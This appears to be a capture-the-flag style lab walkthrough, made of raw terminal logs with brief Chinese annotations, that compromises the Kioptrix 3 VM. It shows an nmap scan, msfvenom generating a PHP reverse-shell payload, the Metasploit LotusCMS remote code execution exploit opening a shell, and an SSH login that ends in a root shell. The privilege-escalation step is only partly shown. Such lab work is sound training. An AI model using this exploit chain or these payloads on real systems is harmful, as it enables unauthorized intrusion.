root@kali:~# nmap -A -sS -n 192.168.43.158 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT Nmap scan report for 192.168.43.158 Host is up (0.00053s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:38:2D:6F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.53 ms 192.168.43.158
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
由扫描信息可以得到
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1114 bytes
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI /lcms/ yes URI VHOST no HTTP server virtual host
Exploit target:
Id Name -- ---- 0 Automatic LotusCMS 3.0
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58 RHOST => 192.168.43.58 msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp PAYLOAD => generic/shell_bind_tcp msf exploit(multi/http/lcms_php_exec) > set URI / URi => / msf exploit(multi/http/lcms_php_exec) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.43.58 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI / yes URI VHOST no HTTP server virtual host
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST 192.168.43.58 no The target address
Exploit target:
Id Name -- ---- 0 Automatic LotusCMS 3.0
msf exploit(multi/http/lcms_php_exec) > run
[*] Started bind handler [-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable. [*] Exploit completed, but no session was created. msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158 RHOST => 192.168.43.158 msf exploit(multi/http/lcms_php_exec) > run
[*] Started bind handler [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400
whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) ls cache core data favicon.ico gallery gnu-lgpl.txt index.php modules style update.php pwd /home/www/kioptrix3.com
root@kali:~# ssh loneferret@192.168.43.158 loneferret@192.168.43.158's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106 loneferret@Kioptrix3:~$ ls checksec.sh CompanyPolicy.README
存在一个CompanyPolicy.README文件.
1 2 3 4 5 6 7 8 9
checksec.sh CompanyPolicy.README loneferret@Kioptrix3:~$ cat CompanyPolicy.README Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination.
root@kali:~# ssh loneferret@192.168.43.158 loneferret@192.168.43.158's password: Last login: Tue May 8 19:27:01 2018 from uknow-pc Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ root@Kioptrix3:~# id uid=0(root) gid=0(root) groups=0(root),100(users) root@Kioptrix3:~# whoami root